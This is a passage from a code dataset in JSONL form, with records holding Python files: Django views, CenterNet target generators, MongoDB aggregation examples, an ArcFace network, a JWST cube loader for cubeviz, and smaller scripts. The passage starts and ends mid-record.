['Robert', 'Lewandowski', 'piłkarz'],\r\n ['Krystyna', 'Janda', 'aktorka']\r\n ]\r\nfor row in list2D:\r\n print('-'.join(row))\r\n","sub_path":"BASIC/04_Kolekcje/Listy.py","file_name":"Listy.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"166495717","text":"# -*- coding: utf-8 -*-\nimport contextlib\nimport datetime\n\n\n@contextlib.contextmanager\ndef log_time(*text):\n print(*text, end=\"...\", flush=True)\n start_time = datetime.datetime.now()\n yield\n print(\"done in %.2fs\" % (datetime.datetime.now() - start_time).total_seconds())\n\n\ndef print_loop(iter, *text):\n for i, item in enumerate(iter):\n print('\\r>> ', *text, end=\" \" + str(i), flush=True)\n yield item\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"481817098","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.views import View\nfrom rest_framework.views import APIView\n\nfrom adoption import logics\nfrom authentication.permissions import *\nfrom backend.config.client_response.response_status import ResponseStatusEnum\nfrom common.exception.childf_exception import ChildfException, exception_handler\nfrom common.util.response_utils import ResponseUtils\nfrom person.models import Hamyar\nfrom person.serializers import MadadjuSerializer, LightMadadjuSerializer\n\n\nclass AllAdoptionsByHamyarAPI(APIView):\n def get(self,request):\n try:\n user = login_required(request)\n check_permission(member=Hamyar, user=user)\n resp_data = 
LightMadadjuSerializer(logics.get_all_madadjus_by_hamyar(user),many=True).data\n            resp_status = ResponseStatusEnum.ok_200\n        except Exception as e:\n            resp_data, resp_status = exception_handler(e)\n        return ResponseUtils.jsonify(response_enum_obj=resp_status.value, data=resp_data)\n\n\nclass AdoptAPI(APIView):\n    def get(self, request, madadju_id):\n        try:\n            user = login_required(request)\n            check_permission(member=Hamyar, user=user)\n            logics.adopt(madadju_id, user)\n            resp_data = \"adopted successfully\"\n            resp_status = ResponseStatusEnum.ok_200\n        except Exception as e:\n            resp_data, resp_status = exception_handler(e)\n        return ResponseUtils.jsonify(response_enum_obj=resp_status.value, data=resp_data)\n\n\nclass AllUnAdoptedMadadjuAPI(APIView):\n    def get(self,request):\n        try:\n            user = login_required(request)\n            check_permission(member=Hamyar, user=user)\n            resp_data = LightMadadjuSerializer(logics.get_all_unadopted_madadju(),many=True).data\n            resp_status = ResponseStatusEnum.ok_200\n        except Exception as e:\n            resp_data, resp_status = exception_handler(e)\n        return ResponseUtils.jsonify(response_enum_obj=resp_status.value, data=resp_data)\n","sub_path":"adoption/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"450961709","text":"__copyright__ = \\\n    \"\"\"\n    # This code is based on \n    # CenterNet (https://github.com/xingyizhou/CenterNet)\n    Copyright (c) 2020 The Board of xx University.\n    All rights reserved.\n\n    This software is covered by China patents and copyright.\n    This source code is to be used for academic research purposes only, and no commercial use is allowed.\n    \"\"\"\n__authors__ = \"\"\n__version__ = \"1.0.0\"\n\nimport numpy as np\nimport cv2\nimport torch\n\n\n\ndef gaussian_radius(det_size, min_overlap=0.8):\n    height, width = det_size\n\n    a1 = 1\n    b1 = (height + width)\n    c1 = width * height * (1 - min_overlap) / (1 + min_overlap)\n    sq1 = np.sqrt(b1 ** 2 - 4 * a1 * c1)\n    r1 = (b1 - sq1) / (2 * a1)\n\n    a2 = 4\n    b2 = 2 * (height + width)\n    c2 = (1 - min_overlap) * width * height\n    sq2 = np.sqrt(b2 ** 2 - 4 * a2 * c2)\n    r2 = (b2 - sq2) / (2 * a2)\n\n    a3 = 4 * min_overlap\n    b3 = -2 * min_overlap * (height + width)\n    c3 = (min_overlap - 1) * width * height\n    sq3 = np.sqrt(b3 ** 2 - 4 * a3 * c3)\n    r3 = (b3 + sq3) / (2 * a3)\n    return min(r1, r2, r3)\n\n\ndef gaussian2D(shape, sigma=1):\n    m, n = [(ss - 1.) / 2. 
for ss in shape]\n y, x = np.ogrid[-m:m + 1, -n:n + 1]\n\n h = np.exp(-(x * x + y * y) / (2 * sigma * sigma))\n h[h < np.finfo(h.dtype).eps * h.max()] = 0\n return h\n\n\ndef draw_umich_gaussian(heatmap, center, radius, k=1):\n diameter = 2 * radius + 1\n gaussian = gaussian2D((diameter, diameter), sigma=diameter / 6)\n\n x, y = int(center[0]), int(center[1])\n\n height, width = heatmap.shape[0:2]\n\n left, right = min(x, radius), min(height - x, radius + 1)\n top, bottom = min(y, radius), min(width - y, radius + 1)\n\n masked_heatmap = heatmap[x - left:x + right, y - top:y + bottom]\n masked_gaussian = gaussian[radius - left:radius + right, radius - top:radius + bottom]\n if min(masked_gaussian.shape) > 0 and min(masked_heatmap.shape) > 0:\n np.maximum(masked_heatmap, masked_gaussian * k, out=masked_heatmap)\n return heatmap\n\n\ndef generate_cls_mask(target_size, cls_locations_list, cls_ids_list, box_sizes_list=None, strategy=\"one-hot\"):\n \"\"\"\n generate the cls mask, the pixel is (w,h)\n :param target_size: tuple(b, h, w, c)\n :param cls_locations_list: list n * 2\n :param cls_ids_list: list n * 1\n :param box_sizes_list: list n * 2\n :param strategy: smoothing, one-hot\n :return: b * c * h * w\n \"\"\"\n b, c, h, w = target_size\n target_mask = np.zeros(target_size, dtype=np.float32)\n for b_i in range(b):\n cls_locations = cls_locations_list[b_i]\n cls_ids = cls_ids_list[b_i]\n box_sizes = box_sizes_list[b_i]\n for i in range(len(cls_locations)):\n cls_location = cls_locations[i]\n cls_id = cls_ids[i]\n if strategy == \"one-hot\":\n target_mask[b_i, cls_id, cls_location[0], cls_location[1]] = 1\n elif strategy == \"smoothing\":\n box_size = box_sizes[i]\n radius = int(max(0, gaussian_radius(box_size)))\n target_mask[b_i, cls_id] = draw_umich_gaussian(target_mask[b_i, cls_id], cls_location, radius)\n else:\n raise ValueError(\"invalid strategy:{}\".format(strategy))\n return target_mask\n\n\ndef generate_instance_mask(target_size, polygons_list):\n \"\"\"\n generate the kp mask\n :param target_size: tuple(b, c, h, w)\n :param polygons_list: list(list(ndarray(n*2)))\n :return: b* 1 * h * w\n \"\"\"\n b, c, h, w = target_size\n assert b == len(polygons_list)\n target_mask = -np.ones((b, 1, h, w), dtype=np.float32)\n for b_i in range(b):\n polygons = polygons_list[b_i]\n for it, polygon in enumerate(polygons):\n target_mask[b_i, 0, polygon[:, 0], polygon[:, 1]] = it\n\n return target_mask\n\n\ninf = 65535\noffsets = np.array([[[-1, -1], [0, -1], [1, -1]],\n [[-1, 0], [0, 0], [1, 0]],\n [[-1, 1], [0, 1], [1, 1]]], dtype=np.float32)\nmask_1 = np.array([[1, 1, 1],\n [1, 1, 0],\n [0, 0, 0]], dtype=np.float32)\nmask_2 = np.array([[0, 0, 0],\n [0, 1, 1],\n [0, 0, 0]], dtype=np.float32)\nmask_3 = np.array([[1, 1, 1],\n [1, 1, 0],\n [0, 0, 0]], dtype=np.float32)\nmask_4 = np.array([[0, 0, 0],\n [0, 1, 1],\n [1, 1, 1]], dtype=np.float32)\n\n\ndef min_distance_pooling(rows, mask, ascent=True):\n \"\"\"\n select the min distance from neighbors on image\n :param rows: 3 * (n + 2) * 2, ndarray\n :param mask: 3 * 3, ndarray\n :param ascent: true-from left to right. 
false-from right to left\n :return: 3 * n\n \"\"\"\n assert rows.shape[0] == mask.shape[0] == mask.shape[1] == 3\n n = rows.shape[1] - 2\n\n index_seq = range(1, n+1) if ascent else range(n, 0, -1)\n for ind in index_seq:\n sub_row = rows[:, ind-1: ind+2, :]\n neighbors = sub_row + offsets\n neighbors_distance = np.sqrt(np.sum(neighbors ** 2, axis=2))\n nonzero_indexes = mask.nonzero()\n selected_distance = neighbors_distance[nonzero_indexes]\n min_index = selected_distance.argmin()\n rows[1, ind, :] = neighbors[nonzero_indexes[0][min_index], nonzero_indexes[1][min_index], :]\n\n\ndef sdf_pass(grid, mask_one, mask_two, ascent=True):\n n = grid.shape[0] - 2\n index_seq = range(1, n+1) if ascent else range(n, 0, -1)\n for ind in index_seq:\n min_distance_pooling(grid[ind-1 : ind+2, :, :], mask_one)\n min_distance_pooling(grid[ind - 1: ind + 2, :, :], mask_two, ascent=False)\n\n\ndef generate_sdf(mat):\n # prepare the data for min-pooling\n h, w = mat.shape\n signal_grid = ((1 - mat) * inf)\n pad_vec_h = np.ones((h, 1), dtype=np.float32) * inf\n pad_vec_w = np.ones((1, w + 2), dtype=np.float32) * inf\n padding_grid = np.vstack((pad_vec_w, np.hstack((pad_vec_h, signal_grid, pad_vec_h)), pad_vec_w))\n grid = np.expand_dims(padding_grid, 2).repeat(2, axis=2)\n # 8SSDET pass\n sdf_pass(grid, mask_1, mask_2)\n sdf_pass(grid, mask_3, mask_4, ascent=False)\n\n return np.ascontiguousarray(grid[1:h+1, 1:w+1, ::-1], dtype=np.float32)\n\n\ndef generate_batch_sdf(batch):\n sdf_list = []\n for mat in batch:\n sdf = generate_sdf(mat[0]).transpose((2, 0, 1))\n sdf_list.append(np.expand_dims(sdf, 0))\n return np.vstack(sdf_list)\n\n\ndef generate_wh_target(target_size, centers_list, box_sizes_list):\n \"\"\"\n generate the mask and target for wh\n :param target_size: b, c, h, w\n :param centers_list:\n :param box_sizes_list:\n :return:\n \"\"\"\n b, c, h, w = target_size\n assert b == len(box_sizes_list)\n wh_mask = np.zeros(target_size, dtype=np.float32)\n wh_target = np.zeros(target_size, dtype=np.float32)\n\n for b_i in range(b):\n centers = centers_list[b_i]\n box_sizes = box_sizes_list[b_i]\n for o_j in range(len(centers)):\n center = centers[o_j]\n box_size = box_sizes[o_j]\n wh_mask[b_i, :, center[0], center[1]] = 1\n wh_target[b_i, :, center[0], center[1]] = box_size\n\n return wh_target, wh_mask\n\n\ndef generate_annotations(targets):\n \"\"\"\n generate the annotations\n :return:\n \"\"\"\n cls_ids_list, polygons_list = targets\n boxes_list = [[(polygon.min(0)[::-1], polygon.max(0)[::-1]) for polygon in polygons] for polygons in polygons_list]\n\n b = len(cls_ids_list)\n max_num = max(len(cls_ids) for cls_ids in cls_ids_list)\n annotations = np.ones((b, max_num, 5), dtype=np.float32)*-1\n\n for b_i in range(b):\n cls_ids = cls_ids_list[b_i]\n boxes = boxes_list[b_i]\n for o_j in range(len(cls_ids)):\n annotations[b_i, o_j, :2] = boxes[o_j][0]\n annotations[b_i, o_j, 2:4] = boxes[o_j][1]\n annotations[b_i, o_j, 4] = cls_ids[o_j]\n\n return annotations\n\n\ndef dense_sample_polygon(polygons_list, h, w):\n normal_vector_list, n_polygons_list = [], []\n\n for polygons in polygons_list:\n normal_vector = []\n n_polygons = []\n for polygon in polygons:\n n_polygon = []\n normals = []\n n = polygon.shape[0]\n for i in range(n):\n j = (i+1) % n\n direction = polygon[j]-polygon[i]\n max_distance = max(abs(direction[0]), abs(direction[1]))\n\n if max_distance == 0:\n continue\n else:\n normal = np.array([-direction[1], direction[0]])\n normal = normal / np.clip(np.sqrt(np.sum(normal * normal)), a_min=1e-4, 
a_max=inf)\n                    if cv2.pointPolygonTest(polygon, tuple((polygon[j]+polygon[i])/2 + normal/abs(normal.max())), False) < 0:\n                        normal = -normal\n\n                    increase = direction / max_distance\n                    for k in range(0, int(max_distance), 2):\n                        point = polygon[i] + increase*k\n                        if 1 < point[0] < h-2 and 1 < point[1] < w-2:\n                            n_polygon.append(point)\n                            normals.append(normal)\n\n            n_polygons.append(np.vstack(n_polygon).astype(np.int32))\n            normal_vector.append(np.vstack(normals).astype(np.float32))\n\n        n_polygons_list.append(n_polygons)\n        normal_vector_list.append(normal_vector)\n\n    return n_polygons_list, normal_vector_list\n\n\ndef generate_kp_mask(kps, size):\n    mask = np.zeros(size, dtype=np.float32)\n    for kp in kps:\n        mask = draw_umich_gaussian(mask, kp, 3)\n    return mask\n\n\ndef generate_instance_ids(polygons_list, h, w):\n    instance_img_list = []\n    for polygons in polygons_list:\n        instance_img = np.zeros((h, w), dtype=np.int) - 1\n        for it, polygon in enumerate(polygons):\n            instance_mask = cv2.fillPoly(np.zeros((h, w), dtype=np.uint8), [polygon[:, ::-1]], 1)\n            instance_img = instance_img*(1-instance_mask) + instance_mask*it\n        instance_img_list.append(instance_img)\n    return instance_img_list\n\n\ndef generate_all_annotations(target_size, targets, device):\n    b, c, h, w = target_size\n    class_map_list, instance_map_list = [], []\n    instance_ids_list = []\n    class_ids_list = []\n    max_instance_num = 0\n    for b_i in range(b):\n        instance_map = torch.from_numpy(targets[b_i][1]).to(device)\n        instance_map_list.append(instance_map)\n\n        class_ids = targets[b_i][0]\n        class_ids_list.append(class_ids)\n\n        instance_ids = np.arange(1, len(class_ids)+1)\n        max_instance_num = max(max_instance_num, len(instance_ids))\n        instance_ids_list.append(instance_ids)\n\n    det_annotations = np.ones((b, max_instance_num, 5), dtype=np.float32) * -1\n    for b_i in range(b):\n        class_ids = class_ids_list[b_i]\n        det_annotations[b_i, :len(class_ids), :] = class_ids\n    return det_annotations, instance_ids_list, instance_map_list\n\n\ndef generate_fcos_annotations(target_size, targets, device):\n    b, c, h, w = target_size\n    class_map_list, instance_map_list = [], []\n    instance_ids_list = []\n    class_ids_list = []\n    max_instance_num = 0\n    for b_i in range(b):\n        instance_map = torch.from_numpy(targets[b_i][1]).to(device)\n        instance_map_list.append(instance_map)\n\n        class_ids = targets[b_i][0]\n        class_ids_list.append(class_ids)\n\n        instance_ids = np.arange(1, len(class_ids)+1)\n        max_instance_num = max(max_instance_num, len(instance_ids))\n        instance_ids_list.append(instance_ids)\n\n    det_annotations = np.ones((b, max_instance_num, 5), dtype=np.float32) * -1\n    gt_boxes = []\n    gt_labels = []\n    for b_i in range(b):\n        class_ids = class_ids_list[b_i]\n        det_annotations[b_i, :len(class_ids), :] = class_ids\n\n        gt_boxes.append(torch.tensor(class_ids[:, :4]).to(device))\n        gt_labels.append(torch.tensor(class_ids[:, 4], dtype=torch.int64).to(device))\n\n    return gt_boxes, gt_labels, det_annotations, instance_ids_list, instance_map_list\n","sub_path":"utils/target_generator.py","file_name":"target_generator.py","file_ext":"py","file_size_in_byte":12006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"370408748","text":"from datetime import datetime\n\nfrom MongoDB.pymongodbExamples.setup.setup import db, docs_insert, resolve\n\n\"\"\"\n{ $group:\n    { _id: <expression>,\n      <field1>: {\n        <accumulator1> : <expression1>\n      },\n      ... 
} \n}\n\n$sum / $avg / $max / $min\n$first / $last\n$push / $addToSet\n$stdDevPop / $stdDevSamp\n\"\"\"\n\nfstr = \"%Y-%m-%d %H:%M:%S\"\ndocuments1 = [\n {\"_id\": 1, \"item\": \"abc\", \"price\": 10, \"quantity\": 2, \"date\": datetime.strptime(\"2014-03-01 08:00:00\", fstr)},\n {\"_id\": 2, \"item\": \"jkl\", \"price\": 20, \"quantity\": 1, \"date\": datetime.strptime(\"2014-03-01 09:00:00\", fstr)},\n {\"_id\": 3, \"item\": \"xyz\", \"price\": 5, \"quantity\": 10, \"date\": datetime.strptime(\"2014-03-15 09:00:00\", fstr)},\n {\"_id\": 4, \"item\": \"xyz\", \"price\": 5, \"quantity\": 20, \"date\": datetime.strptime(\"2014-04-04 11:21:39\", fstr)},\n {\"_id\": 5, \"item\": \"abc\", \"price\": 10, \"quantity\": 10, \"date\": datetime.strptime(\"2014-04-04 21:23:13\", fstr)}\n]\n\npipeline1 = [\n {\"$group\": {\n \"_id\": {\n \"month\": {\"$month\": \"$date\"},\n \"day\": {\"$dayOfMonth\": \"$date\"},\n \"year\": {\"$year\": \"$date\"}\n },\n \"totalPrice\": {\n \"$sum\": {\"$multiply\": [\"$price\", \"$quantity\"]}\n },\n \"averageQuantity\": {\"$avg\": \"$quantity\"},\n \"count\": {\"$sum\": 1}\n }}\n]\n\n# retrieve distinct values\npipeline2 = [\n {\"$group\": {\n \"_id\": \"$item\"\n }}\n]\n\ndocuments2 = [\n {\"_id\": 8751, \"title\": \"The Banquet\", \"author\": \"Dante\", \"copies\": 2},\n {\"_id\": 8752, \"title\": \"Divine Comedy\", \"author\": \"Dante\", \"copies\": 1},\n {\"_id\": 8645, \"title\": \"Eclogues\", \"author\": \"Dante\", \"copies\": 2},\n {\"_id\": 7000, \"title\": \"The Odyssey\", \"author\": \"Homer\", \"copies\": 10},\n {\"_id\": 7020, \"title\": \"Iliad\", \"author\": \"Homer\", \"copies\": 10}\n]\n\npipeline3 = [\n {\"$group\": {\n \"_id\": \"$author\",\n \"books\": {\"$push\": \"$title\"}\n }}\n]\n\n# $$ROOT表示对应的document\npipeline4 = [\n {\"$group\": {\n \"_id\": \"$author\",\n \"books\": {\"$push\": \"$$ROOT\"}\n }}\n]\n\nif __name__ == '__main__':\n docs_insert(db, \"sales\", documents2)\n resolve(db, \"sales\", pipeline3)\n","sub_path":"MongoDB/pymongodbExamples/aggregationExamples/example_group.py","file_name":"example_group.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"648365534","text":"# coding: utf-8\n\nimport os\n\nimport FWCore.ParameterSet.Config as cms\nfrom FWCore.ParameterSet.VarParsing import VarParsing\n\n# setup minimal options\n#options = VarParsing(\"python\")\n#options.setDefault(\"inputFiles\", \"root://xrootd-cms.infn.it//store/mc/RunIIFall17MiniAOD/DYJetsToLL_M-10to50_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/94X_mc2017_realistic_v10-v2/00000/9A439935-1FFF-E711-AE07-D4AE5269F5FF.root\") # noqa\n#options.parseArguments()\n\n# define the process to run\nprocess = cms.Process(\"TEST\")\n\n# minimal configuration\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\nprocess.maxEvents = cms.untracked.PSet(input=cms.untracked.int32(1))\n#process.source = cms.Source(\"PoolSource\",\n# fileNames=cms.untracked.vstring('file:/afs/cern.ch/cms/Tutorials/TWIKI_DATA/TTJets_8TeV_53X.root'))\nprocess.source = cms.Source(\"EmptySource\")\n# process options\nprocess.options = cms.untracked.PSet(\n allowUnscheduled=cms.untracked.bool(True),\n wantSummary=cms.untracked.bool(True),\n)\n\nprocess.XGBoostExample = cms.EDAnalyzer(\"XGBoostExample\")\n\n# setup MyPlugin by loading the auto-generated cfi (see 
MyPlugin.fillDescriptions)\n#process.load(\"XGB_Example.XGBoostExample.XGBoostExample_cfi\")\nprocess.XGBoostExample.model_path = cms.string(\"/Your/Path/data/lowVer.model\")\nprocess.XGBoostExample.test_data_path = cms.string(\"/Your/Path/data/Test_data.csv\")\n\n# define what to run in the path\nprocess.p = cms.Path(process.XGBoostExample)\n","sub_path":"content/inference/code/XGBoost/XGB_Example_Lower/XGBoostExample/python/xgboost_cfg.py","file_name":"xgboost_cfg.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"246809577","text":"\"\"\"\r\nPangrams - sentences with all US alphabet. Find letters missing in alphabet\r\n@author - Kestutis ITDev\r\n@date - 2013.07.14\r\n@email - kestutis.itsolutions@gmail.com\r\n@description - CodeEval Challenge #31, Print missing letters in pangrams\r\n@version - 1.0\r\n\"\"\"\r\n__author__ = 'Kestutis ITDev'\r\n\r\n#Read lines from console\r\nfrom sys import argv\r\n#Get a list of ascii lowercase letters\r\nfrom string import ascii_lowercase\r\n\r\n#command line interface?\r\ncli = True\r\n\r\nif cli:\r\n file = argv[1]\r\nelse:\r\n file = 'Data31.txt'\r\n\r\n\"\"\"\r\n@param sentence - the sentence, to be used for a search\r\n@param ABC - the dictionary\r\n@return - missing letters from 'ABC' in a 'sentence'\r\n\"\"\"\r\ndef getMissingABCLetters(sentence, ABC):\r\n #what to return\r\n ret = \"\"\r\n\r\n for theChar in ABC:\r\n #Get total char occurrences in sentence\r\n if sentence.count(theChar) == 0:\r\n ret += theChar\r\n\r\n if len(ret) == 0:\r\n return \"NULL\"\r\n else:\r\n return ret\r\n\r\n\r\n#This is all our lowercase letters we need\r\nlistOfLowercaseLetters = ascii_lowercase\r\n\r\n#debug\r\n#print([\"ABC:\", listOfLowercaseLetters])\r\n\r\n#open file for reading\r\ntextLines = open(file, 'r')\r\n\r\nfor line in textLines:\r\n #break the loop in case of empty line\r\n if line == '\\n':\r\n break\r\n\r\n line = line.rstrip()\r\n #debug\r\n #print(\"-------------------------------\")\r\n #print(\"LINE:\", line) \r\n\r\n #pass lowercase sentence and list of lowercase letters\r\n missingLetters = getMissingABCLetters(line.lower(), listOfLowercaseLetters)\r\n\r\n #print missing letters\r\n print(missingLetters)\r\n\r\n#close the file\r\ntextLines.close()","sub_path":"2-moderateComplexityChallenges/pangramsByKestutis.py3","file_name":"pangramsByKestutis.py3","file_ext":"py3","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459507085","text":"from pulsar.apps.wsgi import HtmlVisitor, AsyncString\n\nfrom lux import Template\n\n\n__all__ = ['ImageProvider', 'Link']\n\n\nLink = Template(tag='a')\n\n\n#class A(HtmlVisitor):\nclass A:\n\n def add_data(self, html, key, value):\n if key == 'icon':\n icon = Icon(html.tag, value)\n html.prepend(icon)\n elif key == 'ajax' and value:\n html.addClass('ajax')\n else:\n super(A, self).add_data(html, key, value)\n\n\nclass Icon(AsyncString):\n '''Must set the ICON_PROVIDER parameter'''\n def __init__(self, tag, value, provider=None):\n super(Icon, self).__init__(value)\n self.tag = tag\n self.provider = provider\n\n def do_stream(self, request):\n if request and self.children:\n p = self.provider or request.app.config.get('ICON_PROVIDER')\n provider = IMAGE_PROVIDERS.get(p)\n if provider:\n yield provider(request, self.tag, self.children[0])\n\n\nIMAGE_PROVIDERS = {}\n\n\nclass ImageType(type):\n\n def __new__(cls, name, bases, 
attrs):\n        new_class = super(ImageType, cls).__new__(cls, name, bases, attrs)\n        name = getattr(new_class, 'name', None)\n        if name:\n            IMAGE_PROVIDERS[name] = new_class()\n        return new_class\n\n\nclass ImageProvider(ImageType('ImageBase', (object,), {})):\n\n    def __call__(self, request, tag, image):\n        raise NotImplementedError\n\n\nclass FontAwesome(ImageProvider):\n    name = 'fontawesome'\n\n    def __call__(self, request, tag, image):\n        return '<i class=\"fa fa-%s\"></i>' % image\n","sub_path":"lux/extensions/sitemap/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"630718657","text":"from tkinter import *\r\n\r\npant1= Tk()\r\n\r\nframe1 = Frame(pant1,width=1000, height=1000)\r\nframe1.pack()\r\n\r\n## Text or labels\r\n#label1 = Label(frame1, text=\"Hola alumnitos <3\")\r\n#label1.place(x=100, y=200)\r\n\r\n## ALTERNATIVE WAY\r\n#Label(frame1, text=\"Hola alumnitos <3\").place(x=100, y=200)#,fg=\"red\" , font=(12)\r\n#,font=(\"Comic Sans MS\",18)\r\n\r\n## INSERT AN IMAGE\r\n\r\n#foto1 = PhotoImage(file=\"foto1.gif\")\r\n#Label(frame1, image = foto1).place(x=100, y=200)\r\n\r\n\r\npant1.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"5_Viernes/19_GUI_Labels.py","file_name":"19_GUI_Labels.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300475687","text":"from __future__ import absolute_import, division, print_function\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom nets.network import Network\nfrom nets.losses import cos_loss\n\n\nclass Arcface(Network):\n    def __init__(self, session, num_classes=None, is_training=True, learn_rate=None):\n        super().__init__(session, scope='arcface')\n\n        if is_training:\n            self.build_tower(num_classes, learn_rate)\n\n        self.load_model()\n\n    def build_tower(self, num_classes, learn_rate):\n        loss, logits = cos_loss(\n            self.embedding, self.labels_ph, emb_dim=512, num_classes=num_classes)\n        tf.summary.scalar('loss', loss)\n\n        accuracy = tf.reduce_mean(\n            tf.cast(tf.equal(tf.argmax(tf.nn.softmax(logits), axis=1), self.labels_ph), dtype=tf.float32))\n        tf.summary.scalar('accuracy', accuracy)\n\n        self.gstep = tf.get_variable('global_step', shape=[], dtype=tf.int32, initializer=tf.zeros_initializer(),\n                                     trainable=False)\n\n        decay_learn_rate = tf.train.exponential_decay(\n            learn_rate, self.gstep, 100000, 0.1, staircase=True)\n\n        self.optim = slim.learning.create_train_op(total_loss=loss,\n                                                   optimizer=tf.train.MomentumOptimizer(decay_learn_rate, momentum=0.9,\n                                                                                        use_nesterov=True),\n                                                   global_step=self.gstep)\n\n\nif __name__ == '__main__':\n    net = Arcface(tf.Session(), num_classes=10000,\n                  is_training=True, learn_rate=1e-2)\n    net.foo()\n","sub_path":"python/nets/arcface.py","file_name":"arcface.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"319296129","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom os.path import splitext\n\nfrom glue.config import data_factory\nfrom glue.core import Data\nfrom glue.core.coordinates import coordinates_from_header\nfrom astropy.io import fits\n\nimport asdf\nfrom asdf.fits_embed import ASDF_EXTENSION_NAME\n\nfrom ..listener import CUBEVIZ_LAYOUT\nfrom ..layout import FLUX, ERROR, MASK\n\n\ndef _is_jwst_asdf_cube(asdffile):\n    meta = asdffile.tree.get('meta')\n    if meta is None:\n
return False\n\n    if meta.get('telescope') != 'JWST':\n        return False\n\n    if meta.get('model_type') != 'IFUCubeModel':\n        return False\n\n    # Other possible checks to use:\n    # meta['exposure']['type'] == 'NRS_IFU' # (for NIRSpec)\n\n    for array_name in ['data', 'dq', 'err']:\n        if array_name not in asdffile.tree:\n            return False\n\n    return True\n\ndef _is_jwst_fits_cube(hdulist):\n    if 'PRIMARY' not in hdulist:\n        return False\n\n    primary = hdulist['PRIMARY'].header\n\n    if not primary.get('TELESCOP', '').startswith('JWST'):\n        return False\n\n    if not primary.get('DATAMODL', '').startswith('IFUCubeModel'):\n        return False\n\n    for extname in ['SCI', 'ERR', 'DQ']:\n        if extname not in hdulist:\n            return False\n\n    return True\n\ndef is_jwst_data_cube(filename, **kwargs):\n    if filename.endswith('.asdf'):\n        try:\n            with asdf.open(filename) as af:\n                return _is_jwst_asdf_cube(af)\n        except ValueError:\n            return False\n    elif filename.endswith('.fits'):\n        try:\n            with fits.open(filename) as hdulist:\n                # Check whether this is an ASDF file embedded in FITS\n                if ASDF_EXTENSION_NAME in hdulist:\n                    with asdf.open(hdulist) as af:\n                        return _is_jwst_asdf_cube(af)\n                # Otherwise treat it as a regular FITS file\n                return _is_jwst_fits_cube(hdulist)\n        except ValueError:\n            return False\n\n    return False\n\ndef _create_data_obj(filename, coords):\n    label = \"JWST data cube: {}\".format(splitext(filename)[0])\n\n    data = Data(label=label)\n    data.coords = coords\n\n    # Set metadata indicating specific cubeviz layout to be used\n    data.meta[CUBEVIZ_LAYOUT] = 'JWST'\n\n    return data\n\ndef _load_jwst_asdf(fileobj, coords):\n    # fileobj parameter can be either filename or HDUList with ASDF-in-FITS\n    asdffile = asdf.open(fileobj)\n\n    data = _create_data_obj(asdffile.tree['meta']['filename'], coords)\n\n    data.add_component(component=asdffile.tree['data'], label=FLUX)\n    data.add_component(component=asdffile.tree['dq'], label=MASK)\n    data.add_component(component=asdffile.tree['err'], label=ERROR)\n\n    return data\n\ndef _load_jwst_fits(hdulist, coords):\n    data = _create_data_obj(hdulist['PRIMARY'].header['FILENAME'], coords)\n\n    data.add_component(component=hdulist['SCI'].data, label=FLUX)\n    data.add_component(component=hdulist['DQ'].data, label=MASK)\n    data.add_component(component=hdulist['ERR'].data, label=ERROR)\n\n    return data\n\n@data_factory('JWST data cube loader', is_jwst_data_cube, priority=1200)\ndef read_jwst_data_cube(filename):\n    # Process ASDF files\n    if filename.endswith('asdf'):\n        # TODO: this is temporary and is not strictly necessary for prototyping\n        # at the moment. We're going to have to implement a GWCSCoordinates\n        # class that both glue and specviz understand.
For now we'll fake it\n # by using the wcs scheme from the FITS 'DATA' HDU below\n data = _load_jwst_asdf(filename, None)\n # Process FITS files (including ASDF-in-FITS)\n else:\n with fits.open(filename) as hdulist:\n coords = coordinates_from_header(hdulist['SCI'].header)\n\n if ASDF_EXTENSION_NAME in hdulist:\n # See above: eventually we will get GWCS data from ASDF itself\n # but for now we're faking it and using the WCS data from FITS\n data = _load_jwst_asdf(hdulist, coords)\n else:\n data = _load_jwst_fits(hdulist, coords)\n\n return data\n","sub_path":"cubeviz/data_factories/jwst.py","file_name":"jwst.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"632804055","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth import login as auth_login, logout as auth_logout, get_user_model\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom django.contrib.auth.decorators import login_required\nfrom movies.models import Review, Movie, Comment\nfrom .models import Userhistory\nUser = get_user_model()\n\n# Create your views here.\ndef signup(request):\n flag = False\n nick_flag = False\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n check_num = 0\n for idx, mul_num in enumerate((5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2)):\n check_num += user.rrn // (10 ** (idx + 1)) % 10 * 